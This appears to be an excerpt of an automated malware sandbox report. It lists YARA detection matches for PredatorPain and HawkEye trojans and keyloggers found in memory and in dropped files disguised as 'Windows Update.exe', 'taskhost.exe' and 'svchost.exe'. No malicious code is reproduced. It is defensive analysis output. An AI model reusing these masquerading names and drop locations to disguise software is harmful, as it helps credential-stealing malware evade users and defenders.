                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED
                    Malicious sample detected (through community Yara rule)
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.72e7ae.3.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.a1fa72.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.5.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.0.iExplorer.exe.6d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.a1fa72.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c8208.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.72e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.3.taskhost.exe.7421c02.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.42e7ae.3.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.3d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d8949.2.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c8208.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.3d6f44.1.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d0000.0.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c0000.0.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.4.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.12.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.42e7ae.13.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.7.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 7.2.iExplorer.exe.6d6f44.3.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.11.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.6.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.2.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d8949.3.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.0.Windows Update.exe.3d6f44.2.raw.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 5.0.taskhost.exe.9c9c0d.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 8.2.Windows Update.exe.3d0000.0.unpack, type: UNPACKEDPE; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000000.227084659.00000000009C2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.276336479.00000000003D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000003.247040604.0000000007404000.00000004.00000001.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.247374939.00000000003D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000002.310765345.00000000003D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000002.340891533.00000000007E2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 0000001A.00000000.286586806.0000000000472000.00000002.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000008.00000000.290325606.0000000002B61000.00000004.00000001.sdmp, type: MEMORY; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000007.00000000.228658758.00000000006D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000022.00000000.321958872.00000000007E2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000007.00000002.248071796.00000000006D2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: 00000005.00000002.320662138.00000000009C2000.00000002.00020000.sdmp, type: MEMORY; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: 00000007.00000003.242361286.0000000000EC4000.00000004.00000001.sdmp, type: MEMORY; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe, type: DROPPED; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED; Matched rule: Detects PredatorPain RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe, type: DROPPED; Matched rule: PredatorPain; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED; Matched rule: Detects HawkEye RAT; Author: Kevin Breen <kevin@techanarchy.net>
                    Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exe, type: DROPPED; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe, type: DROPPED; Matched rule: detect HawkEye in memory; Author: JPCERT/CC Incident Response Group
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2200
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_0040686C
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_00406095
                    Source: C:\Users\user\Desktop\aaVb1xEmrd.exe; Code function: 1_2_004046B8
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Code function: 4_2_00007FFAEE5E3DDC
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009CD426
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009DD5AE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009CD523
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009CD6C4
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009D7646
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A029BE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A06AF4
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A2ABFC
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A23CBE
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A23C4D
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A23DC0
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_00A23D2F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009CED03
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009CCF92
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009DAFA6
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05208D68
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05205758
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05206048
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05207098
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05205753
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05208D5F
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05201D98
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_05207093
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exe; Code function: 5_2_009FC7BC
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006FF0FC
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006DC162
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006DC25F
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006EC2EA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006E6382
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006DC400
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_007116FA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_00715830
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_00739938
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_007329FA
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_00732989
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_00732A6B
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006DDA3F
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_00732AFC
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006E9CE2
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_006DBCCE
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_0070B4F8
                    Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe; Code function: 7_2_02950D58
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003FF0FC
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003DC162
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003DC25F
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003EC2EA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003E6382
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003DC400
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_004116FA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_00415830
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_00439938
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_004329FA
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_00432989
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003DDA3F
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_00432A6B
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_00432AFC
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003E9CE2
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_003DBCCE
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_04D64470
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Code function: 8_2_0040B4F8
                    Source: MULTIBOT_NEWW.exe.1.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: taskhost.exe.1.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: taskhost.exe.1.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: taskhost.exe.1.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: iExplorer.exe.1.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.5.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.5.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: WindowsUpdate.exe.5.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: Windows Update.exe.7.dr; Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                    Source: C:\Users\user\AppData\Local\Temp\svchost.exe; Section loaded: security.dll
                    Source: C:\Users\user\AppData\Roaming\Windows Update.exe; Section loaded: security.dll
                    Source: C:\Users\gghfgh\AppData\Roaming\Microsoft\Local\svchost.exe; Section loaded: security.dll
                    Source: aaVb1xEmrd.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE; Matched rule: RAT_PredatorPain date = 01.04.2014, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, description = Detects PredatorPain RAT, reference = http://malwareconfig.com/stats/PredatorPain
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
                    Source: 8.0.Windows Update.exe.3d0000.10.unpack, type: UNPACKEDPE; Matched rule: PredatorPain date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/PredatorPain
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE; Matched rule: RAT_HawkEye date = 01.06.2015, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = KeyLogger, description = Detects HawkEye RAT, reference = http://malwareconfig.com/stats/HawkEye
                    Source: 5.2.taskhost.exe.30d936c.5.raw.unpack, type: UNPACKEDPE; Matched rule: HKTL_NET_GUID_Stealer date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/malwares/Stealer, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
